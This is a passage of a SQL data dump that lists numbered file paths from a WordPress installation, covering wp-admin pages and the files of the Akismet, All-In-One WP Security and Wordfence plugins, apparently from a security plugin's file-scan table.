php'),(480,'wp-admin/ms-admin.php'),(481,'wp-admin/ms-delete-site.php'),(482,'wp-admin/ms-edit.php'),(483,'wp-admin/ms-options.php'),(484,'wp-admin/ms-sites.php'),(485,'wp-admin/ms-themes.php'),(486,'wp-admin/ms-upgrade-network.php'),(487,'wp-admin/ms-users.php'),(488,'wp-admin/my-sites.php'),(489,'wp-admin/nav-menus.php'),(490,'wp-admin/network/about.php'),(491,'wp-admin/network/admin.php'),(492,'wp-admin/network/credits.php'),(493,'wp-admin/network/edit.php'),(494,'wp-admin/network/freedoms.php'),(495,'wp-admin/network/index.php'),(496,'wp-admin/network/menu.php'),(497,'wp-admin/network/plugin-editor.php'),(498,'wp-admin/network/plugin-install.php'),(499,'wp-admin/network/plugins.php'),(500,'wp-admin/network/privacy.php'),(501,'wp-admin/network/profile.php'),(502,'wp-admin/network/settings.php'),(503,'wp-admin/network/setup.php'),(504,'wp-admin/network/site-info.php'),(505,'wp-admin/network/site-new.php'),(506,'wp-admin/network/site-settings.php'),(507,'wp-admin/network/site-themes.php'),(508,'wp-admin/network/site-users.php'),(509,'wp-admin/network/sites.php'),(510,'wp-admin/network/theme-editor.php'),(511,'wp-admin/network/theme-install.php'),(512,'wp-admin/network/themes.php'),(513,'wp-admin/network/update-core.php'),(514,'wp-admin/network/update.php'),(515,'wp-admin/network/upgrade.php'),(516,'wp-admin/network/user-edit.php'),(517,'wp-admin/network/user-new.php'),(518,'wp-admin/network/users.php'),(519,'wp-admin/network.php'),(520,'wp-admin/options-discussion.php'),(521,'wp-admin/options-general.php'),(522,'wp-admin/options-head.php'),(523,'wp-admin/options-media.php'),(524,'wp-admin/options-permalink.php'),(525,'wp-admin/options-privacy.php'),(526,'wp-admin/options-reading.php'),(527,'wp-admin/options-writing.php'),(528,'wp-admin/options.php'),(529,'wp-admin/plugin-editor.php'),(530,'wp-admin/plugin-install.php'),(531,'wp-admin/plugins.php'),(532,'wp-admin/post-new.php'),(533,'wp-admin/post.php'),(534,'wp-admin/press-this.php'),(535,'wp-admin/privacy-policy-guide.php'),(536,'wp-admin/privacy.php'),(537,'wp-admin/profile.php'),(538,'wp-admin/revision.php'),(539,'wp-admin/setup-config.php'),(540,'wp-admin/site-health-info.php'),(541,'wp-admin/site-health.php'),(542,'wp-admin/term.php'),(543,'wp-admin/theme-editor.php'),(544,'wp-admin/theme-install.php'),(545,'wp-admin/themes.php'),(546,'wp-admin/tools.php'),(547,'wp-admin/update-core.php'),(548,'wp-admin/update.php'),(549,'wp-admin/upgrade-functions.php'),(550,'wp-admin/upgrade.php'),(551,'wp-admin/upload.php'),(552,'wp-admin/user/about.php'),(553,'wp-admin/user/admin.php'),(554,'wp-admin/user/credits.php'),(555,'wp-admin/user/freedoms.php'),(556,'wp-admin/user/index.php'),(557,'wp-admin/user/menu.php'),(558,'wp-admin/user/privacy.php'),(559,'wp-admin/user/profile.php'),(560,'wp-admin/user/user-edit.php'),(561,'wp-admin/user-edit.php'),(562,'wp-admin/user-new.php'),(563,'wp-admin/users.php'),(564,'wp-admin/widgets.php'),(565,'wp-blog-header.php'),(566,'wp-comments-post.php'),(567,'wp-config-sample.php'),(568,'wp-config.php'),(569,'wp-content/index.php'),(570,'wp-content/plugins/akismet/.htaccess'),(571,'wp-content/plugins/akismet/LICENSE.txt'),(572,'wp-content/plugins/akismet/_inc/akismet.css'),(573,'wp-content/plugins/akismet/_inc/akismet.js'),(574,'wp-content/plugins/akismet/_inc/form.js'),(575,'wp-content/plugins/akismet/_inc/img/logo-full-2x.png'),(576,'wp-content/plugins/akismet/akismet.php'),(577,'wp-content/plugins/akismet/changelog.txt'),(578,'wp-content/plugins/akismet/class.akismet-admin.php'),(579,'wp-content/plugins/akismet/class.akismet-cli.php'),(580,'wp-content/plugins/akismet/class.akismet-rest-api.php'),(581,'wp-content/plugins/akismet/class.akismet-widget.php'),(582,'wp-content/plugins/akismet/class.akismet.php'),(583,'wp-content/plugins/akismet/index.php'),(584,'wp-content/plugins/akismet/readme.txt'),(585,'wp-content/plugins/akismet/views/activate.php'),(586,'wp-content/plugins/akismet/views/config.php'),(587,'wp-content/plugins/akismet/views/connect-jp.php'),(588,'wp-content/plugins/akismet/views/enter.php'),(589,'wp-content/plugins/akismet/views/get.php'),(590,'wp-content/plugins/akismet/views/notice.php'),(591,'wp-content/plugins/akismet/views/predefined.php'),(592,'wp-content/plugins/akismet/views/setup.php'),(593,'wp-content/plugins/akismet/views/start.php'),(594,'wp-content/plugins/akismet/views/stats.php'),(595,'wp-content/plugins/akismet/views/title.php'),(596,'wp-content/plugins/akismet/wrapper.php'),(597,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/general/wp-security-list-table.php'),(598,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.html'),(599,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.php'),(600,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-init.php'),(601,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-menu.php'),(602,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-blacklist-menu.php'),(603,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-brute-force-menu.php'),(604,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-dashboard-menu.php'),(605,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-database-menu.php'),(606,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filescan-menu.php'),(607,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php'),(608,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-firewall-menu.php'),(609,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-404.php'),(610,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-acct-activity.php'),(611,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-comment-spammer-ip.php'),(612,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-locked-ip.php'),(613,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-logged-in-users.php'),(614,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-login-fails.php'),(615,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-permanent-blocked-ip.php'),(616,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-registered-users.php'),(617,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-maintenance-menu.php'),(618,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-misc-options-menu.php'),(619,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-settings-menu.php'),(620,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-spam-menu.php'),(621,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-accounts-menu.php'),(622,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-login-menu.php'),(623,'wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-registration-menu.php'),(624,'wp-content/plugins/all-in-one-wp-security-and-firewall/backups/index.html'),(625,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item-manager.php'),(626,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item.php'),(627,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.html'),(628,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.php'),(629,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-backup.php'),(630,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-blocking.php'),(631,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-bot-protection.php'),(632,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-captcha.php'),(633,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-config.php'),(634,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-configure-settings.php'),(635,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-cronjob-handler.php'),(636,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-deactivation-tasks.php'),(637,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-debug-logger.php'),(638,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-file-scan.php'),(639,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-general-init-tasks.php'),(640,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-installer.php'),(641,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-process-renamed-login-page.php'),(642,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-login.php'),(643,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-user-registration.php'),(644,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-file.php'),(645,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-ip-address.php'),(646,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility.php'),(647,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-footer-content.php'),(648,'wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-wp-loaded-tasks.php'),(649,'wp-content/plugins/all-in-one-wp-security-and-firewall/css/index.html'),(650,'wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-admin-styles.css'),(651,'wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-site-lockout-page.css'),(652,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/arrow.png'),(653,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/error.png'),(654,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-difficulty-badge-bg.png'),(655,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/feature-points-badge-bg.png'),(656,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/form_bg.png'),(657,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/index.html'),(658,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/info-icon.png'),(659,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif'),(660,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon.png'),(661,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/plugin-icon2.png'),(662,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-info-icon-36.png'),(663,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/shield-security-icon-36.png'),(664,'wp-content/plugins/all-in-one-wp-security-and-firewall/images/success.png'),(665,'wp-content/plugins/all-in-one-wp-security-and-firewall/index.html'),(666,'wp-content/plugins/all-in-one-wp-security-and-firewall/js/index.html'),(667,'wp-content/plugins/all-in-one-wp-security-and-firewall/js/password-strength-tool.js'),(668,'wp-content/plugins/all-in-one-wp-security-and-firewall/js/wp-security-admin-script.js'),(669,'wp-content/plugins/all-in-one-wp-security-and-firewall/lib/index.html'),(670,'wp-content/plugins/all-in-one-wp-security-and-firewall/license.txt'),(671,'wp-content/plugins/all-in-one-wp-security-and-firewall/logs/index.html'),(672,'wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log-cron-job.txt'),(673,'wp-content/plugins/all-in-one-wp-security-and-firewall/logs/wp-security-log.txt'),(674,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/index.html'),(675,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-2.php'),(676,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-7.php'),(677,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature.php'),(678,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-stop-users-enumeration.php'),(679,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php'),(680,'wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-visitor-lockout-page.php'),(681,'wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt'),(682,'wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security-core.php'),(683,'wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security.php'),(684,'wp-content/plugins/hello.php'),(685,'wp-content/plugins/index.php'),(686,'wp-content/plugins/wordfence/crypto/vendor/autoload.php'),(687,'wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php'),(688,'wp-content/plugins/wordfence/crypto/vendor/composer/InstalledVersions.php'),(689,'wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE'),(690,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php'),(691,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php'),(692,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php'),(693,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_psr4.php'),(694,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_real.php'),(695,'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php'),(696,'wp-content/plugins/wordfence/crypto/vendor/composer/installed.json'),(697,'wp-content/plugins/wordfence/crypto/vendor/composer/installed.php'),(698,'wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php'),(699,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE'),(700,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey'),(701,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc'),(702,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php'),(703,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php'),(704,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php'),(705,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php'),(706,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_com_dotnet.php'),(707,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php'),(708,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php'),(709,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php'),(710,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php'),(711,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php'),(712,'wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/psalm-autoload.php'),(713,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE'),(714,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php'),(715,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php'),(716,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php'),(717,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-phpunit.php'),(718,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload.php'),(719,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json'),(720,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php'),(721,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php'),(722,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat.php'),(723,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php'),(724,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/sodium_compat.php'),(725,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php'),(726,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/BLAKE2b.php'),(727,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(728,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(729,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php'),(730,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(731,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(732,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(733,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(734,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(735,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(736,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php'),(737,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php'),(738,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Ed25519.php'),(739,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php'),(740,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php'),(741,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php'),(742,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305.php'),(743,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php'),(744,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/SipHash.php'),(745,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php'),(746,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/X25519.php'),(747,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php'),(748,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php'),(749,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Crypto.php'),(750,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/File.php'),(751,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml'),(752,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml'),(753,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php'),(754,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php'),(755,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Common.php'),(756,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/Original.php'),(757,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php'),(758,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php'),(759,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(760,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php'),(761,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php'),(762,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(763,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(764,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(765,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(766,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(767,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php'),(768,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519.php'),(769,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php'),(770,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php'),(771,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HSalsa20.php'),(772,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php'),(773,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php'),(774,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php'),(775,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php'),(776,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SipHash.php'),(777,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php'),(778,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php'),(779,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XChaCha20.php'),(780,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/XSalsa20.php'),(781,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php'),(782,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(783,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(784,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php'),(785,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php'),(786,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(787,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(788,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(789,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(790,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(791,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php'),(792,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php'),(793,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Ed25519.php'),(794,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php'),(795,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php'),(796,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int32.php'),(797,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Int64.php'),(798,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php'),(799,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305.php'),(800,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Salsa20.php'),(801,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php'),(802,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php'),(803,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php'),(804,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php'),(805,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php'),(806,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XSalsa20.php'),(807,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php'),(808,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php'),(809,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php'),(810,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php'),(811,'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php'),(812,'wp-content/plugins/wordfence/css/activity-report-widget.1623076348.css'),(813,'wp-content/plugins/wordfence/css/diff.1623076348.css'),(814,'wp-content/plugins/wordfence/css/dt_table.1623076348.css'),(815,'wp-content/plugins/wordfence/css/fullLog.1623076348.css'),(816,'wp-content/plugins/wordfence/css/images/ui-icons_444444_256x240.png'),(817,'wp-content/plugins/wordfence/css/images/ui-icons_555555_256x240.png'),(818,'wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png'),(819,'wp-content/plugins/wordfence/css/images/ui-icons_777777_256x240.png'),(820,'wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png'),(821,'wp-content/plugins/wordfence/css/images/ui-icons_ffffff_256x240.png'),(822,'wp-content/plugins/wordfence/css/iptraf.1623076348.css'),(823,'wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1623076348.css'),(824,'wp-content/plugins/wordfence/css/jquery-ui.min.1623076348.css'),(825,'wp-content/plugins/wordfence/css/jquery-ui.structure.min.1623076348.css'),(826,'wp-content/plugins/wordfence/css/jquery-ui.theme.min.1623076348.css'),(827,'wp-content/plugins/wordfence/css/main.1623076348.css'),(828,'wp-content/plugins/wordfence/css/phpinfo.1623076348.css'),(829,'wp-content/plugins/wordfence/css/wf-adminbar.1623076348.css'),(830,'wp-content/plugins/wordfence/css/wf-colorbox.1623076348.css'),(831,'wp-content/plugins/wordfence/css/wf-font-awesome.1623076348.css'),(832,'wp-content/plugins/wordfence/css/wf-global.1623076348.css'),(833,'wp-content/plugins/wordfence/css/wf-ionicons.1623076348.css'),(834,'wp-content/plugins/wordfence/css/wf-onboarding.1623076348.css'),(835,'wp-content/plugins/wordfence/css/wf-roboto-font.1623076348.css'),(836,'wp-content/plugins/wordfence/css/wfselect2.min.1623076348.css'),(837,'wp-content/plugins/wordfence/css/wordfenceBox.1623076348.css'),(838,'wp-content/plugins/wordfence/images/2fa-whole.svg'),(839,'wp-content/plugins/wordfence/images/2fa1.svg'),(840,'wp-content/plugins/wordfence/images/2fa2.svg'),(841,'wp-content/plugins/wordfence/images/back_disabled.jpg'),(842,'wp-content/plugins/wordfence/images/back_enabled.jpg'),(843,'wp-content/plugins/wordfence/images/blocking.svg'),(844,'wp-content/plugins/wordfence/images/button-grad-grey.png'),(845,'wp-content/plugins/wordfence/images/checkbox.png'),(846,'wp-content/plugins/wordfence/images/flags.png'),(847,'wp-content/plugins/wordfence/images/forward_disabled.jpg'),(848,'wp-content/plugins/wordfence/images/forward_enabled.jpg'),(849,'wp-content/plugins/wordfence/images/help.png'),(850,'wp-content/plugins/wordfence/images/icons/ajax24.gif'),(851,'wp-content/plugins/wordfence/images/icons/ajax3.gif'),(852,'wp-content/plugins/wordfence/images/icons/ajaxRed16.gif'),(853,'wp-content/plugins/wordfence/images/icons/ajaxScan.gif'),(854,'wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif'),(855,'wp-content/plugins/wordfence/images/icons/arrow_refresh.png'),(856,'wp-content/plugins/wordfence/images/icons/bullet_yellow.png'),(857,'wp-content/plugins/wordfence/images/icons/email_go.png'),(858,'wp-content/plugins/wordfence/images/icons/error128.png'),(859,'wp-content/plugins/wordfence/images/icons/magnifier.png'),(860,'wp-content/plugins/wordfence/images/icons/tick128.png'),(861,'wp-content/plugins/wordfence/images/icons/warning128.png'),(862,'wp-content/plugins/wordfence/images/icons/working-indicator.gif'),(863,'wp-content/plugins/wordfence/images/lightbox-controls.png'),(864,'wp-content/plugins/wordfence/images/loading.gif'),(865,'wp-content/plugins/wordfence/images/loading_background.png'),(866,'wp-content/plugins/wordfence/images/loading_large.gif'),(867,'wp-content/plugins/wordfence/images/logo.png'),(868,'wp-content/plugins/wordfence/images/options.svg'),(869,'wp-content/plugins/wordfence/images/ratelimiting.svg'),(870,'wp-content/plugins/wordfence/images/sort_asc.gif'),(871,'wp-content/plugins/wordfence/images/sort_asc.png'),(872,'wp-content/plugins/wordfence/images/sort_asc_disabled.gif'),(873,'wp-content/plugins/wordfence/images/sort_asc_disabled.png'),(874,'wp-content/plugins/wordfence/images/sort_both.gif'),(875,'wp-content/plugins/wordfence/images/sort_both.png'),(876,'wp-